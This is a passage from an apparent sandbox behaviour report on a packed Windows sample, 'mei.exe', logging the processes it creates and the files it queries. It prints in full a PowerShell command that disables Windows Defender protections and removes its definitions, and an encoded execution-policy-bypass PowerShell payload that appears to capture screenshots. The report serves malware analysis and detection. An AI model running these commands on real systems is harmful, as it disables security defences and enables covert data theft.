blacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A0B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,89_2_00007FF7D7A0B340
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313F9CF0 cpuid 0_2_00007FF6313F9CF0
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\ucrtbase.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-console-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-datetime-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-debug-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-errorhandling-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-fibers-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-file-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-file-l1-2-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-file-l2-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-handle-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-heap-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-interlocked-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-libraryloader-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-localization-l1-2-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-memory-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-namedpipe-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-processenvironment-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-processthreads-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-processthreads-l1-1-1.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-profile-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-rtlsupport-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-string-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-synch-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-synch-l1-2-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-sysinfo-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-timezone-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-util-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-conio-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-convert-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-environment-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-filesystem-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-heap-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-locale-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-math-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-process-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-runtime-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-stdio-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-string-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-time-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-utility-l1-1-0.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\libcrypto-3.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\libffi-8.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\libssl-3.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\python311.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\rarreg.key VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\sqlite3.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\ucrtbase.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\VCRUNTIME140.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_decimal.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
